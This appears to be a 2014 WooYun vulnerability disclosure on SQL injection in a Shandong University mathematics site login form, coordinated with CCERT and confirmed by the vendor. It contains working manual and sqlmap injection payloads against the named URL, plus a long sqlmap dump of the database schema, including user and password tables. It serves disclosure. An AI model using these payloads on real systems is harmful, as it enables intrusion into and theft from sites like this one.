当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-087787

漏洞标题:山东大学数学学院SQL注入

相关厂商:山东大学

漏洞作者: ucifer

提交时间:2014-12-20 17:55

修复时间:2015-02-03 17:56

公开时间:2015-02-03 17:56

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-20: 细节已通知厂商并且等待厂商处理中
2014-12-22: 厂商已经确认,细节仅向厂商公开
2015-01-01: 细节向核心白帽子及相关领域专家公开
2015-01-11: 细节向普通白帽子公开
2015-01-21: 细节向实习白帽子公开
2015-02-03: 细节向公众公开

简要描述:


详细说明:

注入链接: http://stu.math.sdu.edu.cn/cms/login.php
注入参数: username
表单提交未对username字段进行过滤,所以引起注入,可获得敏感信息。
用户名写入

'having 1=1--

密码随意
返回信息是

Error!
Description:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Back:返回


初步判断username字段存在post注入
用户名写入,密码随意

admin' union select 1 from (select count(*),concat(floor(rand(0)*2),(select user() limit 0,1))a from information_schema.tables group by a)b#


返回信息是

Error!
Description:Duplicate entry '1stu@localhost' for key 'group_key'
Back:返回


获得了用户名,接着就上神器sqlmap。。

漏洞证明:

Place: POST
Parameter: username
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: username=admin' AND 4227=4227 AND 'SkxV'='SkxV&password=admin
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: username=admin' AND (SELECT 4781 FROM(SELECT COUNT(*),CONCAT(0x7175677a71,(SELECT (CASE WHEN (4781=4781) THEN 1 ELSE 0 END)),0x7163657071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'NnZN'='NnZN&password=admin
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: username=admin' AND SLEEP(5) AND 'qzHD'='qzHD&password=admin
---
[09:45:18] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0
[09:45:18] [INFO] fetching database names
[09:45:18] [INFO] the SQL query used returns 3 entries
[09:45:18] [INFO] resumed: information_schema
[09:45:18] [INFO] resumed: stu_maths
[09:45:18] [INFO] resumed: test
available databases [3]:
[*] information_schema
[*] stu_maths
[*] test


Database: stu_maths
Table: new_subject
[9 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| addtime    | datetime     |
| ename      | varchar(25)  |
| flag       | int(1)       |
| id         | int(8)       |
| infomation | mediumtext   |
| name       | varchar(100) |
| picture    | varchar(25)  |
| priority   | int(10)      |
| url        | varchar(100) |
+------------+--------------+
Database: stu_maths
Table: new_mark
[5 columns]
+---------------+---------+
| Column        | Type    |
+---------------+---------+
| a_id          | int(10) |
| id            | int(10) |
| quality_mark  | int(5)  |
| quantity_mark | int(5)  |
| u_id          | int(10) |
+---------------+---------+
Database: stu_maths
Table: manage
[4 columns]
+-------------+-------------+
| Column      | Type        |
+-------------+-------------+
| names       | varchar(20) |
| col_present | int(11)     |
| id          | int(11)     |
| pass        | varchar(80) |
+-------------+-------------+
Database: stu_maths
Table: passage_bak
[20 columns]
+-----------+------------------+
| Column    | Type             |
+-----------+------------------+
| addtime   | datetime         |
| blockid   | int(10)          |
| blockname | varchar(10)      |
| catename  | varchar(10)      |
| content   | mediumtext       |
| editor    | varchar(50)      |
| edittime  | datetime         |
| hits      | int(11)          |
| info      | mediumtext       |
| iscomment | enum('no','yes') |
| ishtml    | enum('no','yes') |
| keyword   | varchar(100)     |
| olink     | varchar(255)     |
| picauthor | varchar(25)      |
| pid       | int(10)          |
| priority  | int(1)           |
| reporter  | varchar(50)      |
| state     | int(1)           |
| subtitle  | varchar(40)      |
| title     | varchar(100)     |
+-----------+------------------+
Database: stu_maths
Table: new_passtemp
[16 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| addtime   | datetime     |
| blockid   | int(8)       |
| blockname | varchar(10)  |
| catename  | varchar(10)  |
| content   | mediumtext   |
| editor    | varchar(10)  |
| info      | mediumtext   |
| keyword   | varchar(50)  |
| olink     | varchar(255) |
| picauthor | varchar(25)  |
| pid       | int(10)      |
| reporter  | varchar(50)  |
| source    | varchar(25)  |
| state     | int(1)       |
| subtitle  | varchar(40)  |
| title     | varchar(100) |
+-----------+--------------+
Database: stu_maths
Table: new_department
[3 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| id     | int(8)      |
| name   | varchar(20) |
| parent | int(3)      |
+--------+-------------+
Database: stu_maths
Table: new_picture
[6 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| addtime   | datetime     |
| filepath  | varchar(150) |
| id        | int(8)       |
| is_passed | tinyint(2)   |
| picposter | varchar(25)  |
| pid       | int(8)       |
+-----------+--------------+
Database: stu_maths
Table: new_comment
[11 columns]
+------------+------------------+
| Column     | Type             |
+------------+------------------+
| addtime    | timestamp        |
| commentid  | int(10) unsigned |
| content    | mediumtext       |
| ipaddress  | varchar(50)      |
| passageid  | int(10) unsigned |
| replyid    | int(10)          |
| replynum   | int(10)          |
| replytext  | mediumtext       |
| standpoint | int(1)           |
| username   | varchar(50)      |
| useros     | varchar(250)     |
+------------+------------------+
Database: stu_maths
Table: new_block
[9 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| blocktype | int(1)      |
| id        | int(2)      |
| isindex   | int(1)      |
| ispassage | int(1)      |
| isson     | int(1)      |
| name      | varchar(30) |
| orders    | int(2)      |
| pagepath  | varchar(50) |
| parent    | int(2)      |
+-----------+-------------+
Database: stu_maths
Table: new_links
[8 columns]
+-------------+-------------+
| Column      | Type        |
+-------------+-------------+
| in          | tinyint(1)  |
| addtime     | datetime    |
| description | varchar(20) |
| flag        | int(1)      |
| linkid      | int(5)      |
| picture     | varchar(50) |
| sitename    | varchar(50) |
| siteurl     | varchar(50) |
+-------------+-------------+
Database: stu_maths
Table: new_assignment
[14 columns]
+---------------+------------+
| Column        | Type       |
+---------------+------------+
| complete      | mediumtext |
| complete_time | date       |
| content       | mediumtext |
| delay         | mediumtext |
| delay_time    | date       |
| dp_id         | int(8)     |
| end_date      | date       |
| flag          | int(3)     |
| h_id          | int(8)     |
| id            | int(8)     |
| re_complete   | text       |
| re_delay      | mediumtext |
| re_do         | mediumtext |
| st_date       | date       |
+---------------+------------+
Database: stu_maths
Table: diaocha_text
[2 columns]
+---------+--------+
| Column  | Type   |
+---------+--------+
| textid  | int(3) |
| titleid | int(3) |
+---------+--------+
Database: stu_maths
Table: new_column_type
[2 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| id     | int(2)      |
| info   | varchar(30) |
+--------+-------------+
Database: stu_maths
Table: new_users
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(7)      |
| name     | varchar(30) |
| password | varchar(60) |
| username | varchar(30) |
+----------+-------------+
Database: stu_maths
Table: app_block
[4 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| blockname  | varchar(100) |
| department | varchar(100) |
| id         | int(2)       |
| message    | text         |
+------------+--------------+
Database: stu_maths
Table: new_w_counter
[16 columns]
+-----------+---------+
| Column    | Type    |
+-----------+---------+
| b_id      | int(5)  |
| Fri       | int(8)  |
| Mon       | int(8)  |
| move_time | int(11) |
| pe_fri    | int(8)  |
| pe_mon    | int(8)  |
| pe_sat    | int(8)  |
| pe_sun    | int(8)  |
| pe_thu    | int(8)  |
| pe_tue    | int(8)  |
| pe_wed    | int(8)  |
| Sat       | int(8)  |
| Sun       | int(8)  |
| Thu       | int(8)  |
| Tue       | int(8)  |
| Wed       | int(8)  |
+-----------+---------+
Database: stu_maths
Table: new_message
[9 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| body     | mediumtext  |
| id       | int(11)     |
| messtype | tinyint(1)  |
| readtime | datetime    |
| receiver | varchar(20) |
| sender   | varchar(20) |
| sendtime | datetime    |
| shuxing  | char(1)     |
| title    | varchar(50) |
+----------+-------------+
Database: stu_maths
Table: get_ip
[7 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| addtime  | datetime     |
| content  | text         |
| id       | int(10)      |
| ip       | varchar(20)  |
| reporter | varchar(10)  |
| subtitle | varchar(80)  |
| title    | varchar(200) |
+----------+--------------+
Database: stu_maths
Table: uploadfile
[8 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| add_href  | varchar(200) |
| enddate   | date         |
| filepath  | varchar(100) |
| filetype  | int(2)       |
| id        | int(100)     |
| is_used   | int(11)      |
| startdate | date         |
| title     | varchar(100) |
+-----------+--------------+
Database: stu_maths
Table: app_application
[13 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| time       | date        |
| ability    | text        |
| beizhu     | varchar(20) |
| college    | varchar(20) |
| department | varchar(20) |
| email      | varchar(20) |
| flag       | int(2)      |
| gender     | int(2)      |
| homepage   | varchar(30) |
| id         | int(8)      |
| mobile     | int(20)     |
| name       | varchar(20) |
| phone      | varchar(20) |
+------------+-------------+
Database: stu_maths
Table: new_passage_old
[20 columns]
+-----------+------------------+
| Column    | Type             |
+-----------+------------------+
| addtime   | datetime         |
| blockid   | int(10)          |
| blockname | varchar(10)      |
| catename  | varchar(10)      |
| content   | mediumtext       |
| editor    | varchar(50)      |
| edittime  | datetime         |
| hits      | int(11)          |
| info      | mediumtext       |
| iscomment | enum('no','yes') |
| ishtml    | enum('no','yes') |
| keyword   | varchar(100)     |
| olink     | varchar(255)     |
| picauthor | varchar(25)      |
| pid       | int(10)          |
| priority  | int(1)           |
| reporter  | varchar(50)      |
| state     | int(1)           |
| subtitle  | varchar(40)      |
| title     | varchar(100)     |
+-----------+------------------+
Database: stu_maths
Table: new_counter
[7 columns]
+------------+------------------+
| Column     | Type             |
+------------+------------------+
| month      | int(8) unsigned  |
| b_id       | int(5) unsigned  |
| now_time   | int(11) unsigned |
| today      | int(8) unsigned  |
| total      | int(8) unsigned  |
| total_time | int(8) unsigned  |
| yesterday  | int(8) unsigned  |
+------------+------------------+
Database: stu_maths
Table: choice
[5 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| choice    | varchar(100) |
| extends   | int(11)      |
| id        | int(11)      |
| IsDefault | set('a','b') |
| num       | int(80)      |
+-----------+--------------+
Database: stu_maths
Table: new_apply_department
[5 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| admin_email | varchar(100) |
| blockname   | varchar(100) |
| id          | int(2)       |
| message     | mediumtext   |
| remark      | varchar(100) |
+-------------+--------------+
Database: stu_maths
Table: new_blocktype
[5 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| blank       | int(1)       |
| description | varchar(200) |
| id          | int(8)       |
| name        | varchar(20)  |
| style       | int(1)       |
+-------------+--------------+
Database: stu_maths
Table: new_topic
[8 columns]
+------------+------------------+
| Column     | Type             |
+------------+------------------+
| asset      | varchar(255)     |
| disset     | varchar(255)     |
| flag       | int(2)           |
| neutrality | varchar(255)     |
| passageid  | int(10) unsigned |
| topicid    | int(10) unsigned |
| topicname  | varchar(100)     |
| topicurl   | varchar(50)      |
+------------+------------------+
Database: stu_maths
Table: new_link
[7 columns]
+---------+-------------+
| Column  | Type        |
+---------+-------------+
| in      | tinyint(1)  |
| des     | varchar(20) |
| id      | int(5)      |
| picture | varchar(50) |
| text    | varchar(50) |
| type    | smallint(3) |
| url     | varchar(50) |
+---------+-------------+
Database: stu_maths
Table: new_column
[6 columns]
+-------------+-------------+
| Column      | Type        |
+-------------+-------------+
| class       | int(3)      |
| class1      | int(2)      |
| column_type | int(2)      |
| id          | int(5)      |
| info        | varchar(50) |
| name        | varchar(50) |
+-------------+-------------+
Database: stu_maths
Table: pas_basic
[11 columns]
+--------------+-----------------+
| Column       | Type            |
+--------------+-----------------+
| blockname    | varchar(20)     |
| catename     | varchar(20)     |
| comment_flag | tinyint(1)      |
| filepath     | varchar(100)    |
| p_id         | int(7) unsigned |
| poster       | varchar(20)     |
| priority     | tinyint(1)      |
| publishtime  | datetime        |
| source       | varchar(30)     |
| state        | tinyint(1)      |
| title        | varchar(200)    |
+--------------+-----------------+
Database: stu_maths
Table: info
[1 column]
+--------+------------------+
| Column | Type             |
+--------+------------------+
| infoid | int(10) unsigned |
+--------+------------------+
Database: stu_maths
Table: new_pic
[16 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| blockname   | varchar(20)  |
| body        | text         |
| catename    | varchar(20)  |
| editor      | varchar(20)  |
| flag        | int(2)       |
| info        | text         |
| p_id        | int(10)      |
| picpath     | varchar(100) |
| picposter   | varchar(20)  |
| postername  | varchar(20)  |
| posttime    | datetime     |
| publishtime | datetime     |
| source      | varchar(20)  |
| state       | int(1)       |
| subtitle    | varchar(80)  |
| title       | varchar(80)  |
+-------------+--------------+
Database: stu_maths
Table: new_passage
[22 columns]
+-----------+------------------+
| Column    | Type             |
+-----------+------------------+
| addtime   | datetime         |
| blockid   | int(10)          |
| blockname | varchar(10)      |
| catename  | varchar(10)      |
| content   | mediumtext       |
| dateline  | int(10) unsigned |
| editor    | varchar(50)      |
| edittime  | datetime         |
| hits      | int(10) unsigned |
| info      | mediumtext       |
| iscomment | enum('no','yes') |
| ishtml    | enum('no','yes') |
| keyword   | varchar(100)     |
| olink     | varchar(255)     |
| picauthor | varchar(25)      |
| pid       | int(10) unsigned |
| priority  | int(1)           |
| reporter  | varchar(50)      |
| source    | varchar(25)      |
| state     | int(1)           |
| subtitle  | varchar(40)      |
| title     | varchar(250)     |
+-----------+------------------+
Database: stu_maths
Table: new_attachment
[7 columns]
+-----------+------------------+
| Column    | Type             |
+-----------+------------------+
| addtime   | datetime         |
| filename  | varchar(50)      |
| filepath  | varchar(200)     |
| filesize  | varchar(50)      |
| id        | int(10)          |
| passageid | int(10) unsigned |
| times     | int(10)          |
+-----------+------------------+
Database: stu_maths
Table: new_today
[4 columns]
+---------+-------------+
| Column  | Type        |
+---------+-------------+
| date    | varchar(50) |
| content | mediumblob  |
| id      | int(11)     |
| title   | text        |
+---------+-------------+
Database: stu_maths
Table: new_application
[13 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| time       | date        |
| ability    | text        |
| beizhu     | varchar(20) |
| college    | varchar(20) |
| department | varchar(20) |
| email      | varchar(20) |
| flag       | int(2)      |
| gender     | int(2)      |
| homepage   | varchar(30) |
| id         | int(8)      |
| mobile     | varchar(30) |
| name       | varchar(20) |
| phone      | varchar(20) |
+------------+-------------+
Database: stu_maths
Table: new_menu
[8 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| active    | int(1)      |
| attribute | int(1)      |
| filepath  | varchar(50) |
| id        | int(2)      |
| name      | varchar(20) |
| orders    | int(2)      |
| parent    | int(2)      |
| style     | int(1)      |
+-----------+-------------+
Database: stu_maths
Table: app_department
[4 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| admin_email | varchar(100) |
| did         | int(3)       |
| name        | varchar(100) |
| remark      | varchar(100) |
+-------------+--------------+
Database: stu_maths
Table: new_usertype
[7 columns]
+-------------+------------------+
| Column      | Type             |
+-------------+------------------+
| active      | enum('yes','no') |
| description | varchar(100)     |
| id          | int(2)           |
| limitarray  | mediumtext       |
| menuarray   | mediumtext       |
| name        | varchar(20)      |
| s_menuarray | mediumtext       |
+-------------+------------------+
Database: stu_maths
Table: new_works
[7 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| action    | varchar(50) |
| addtime   | varchar(20) |
| id        | int(11)     |
| ipaddress | varchar(20) |
| passageid | int(8)      |
| script    | varchar(50) |
| userid    | int(8)      |
+-----------+-------------+
Database: stu_maths
Table: new_actions
[6 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| active      | int(1)       |
| description | varchar(200) |
| ename       | varchar(50)  |
| id          | int(2)       |
| islog       | int(1)       |
| name        | varchar(20)  |
+-------------+--------------+


信息量太大,就不往下进行了。。

修复方案:

过滤

版权声明:转载请注明来源 ucifer@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-12-22 09:18

厂商回复:

通知用户处理中

最新状态:

暂无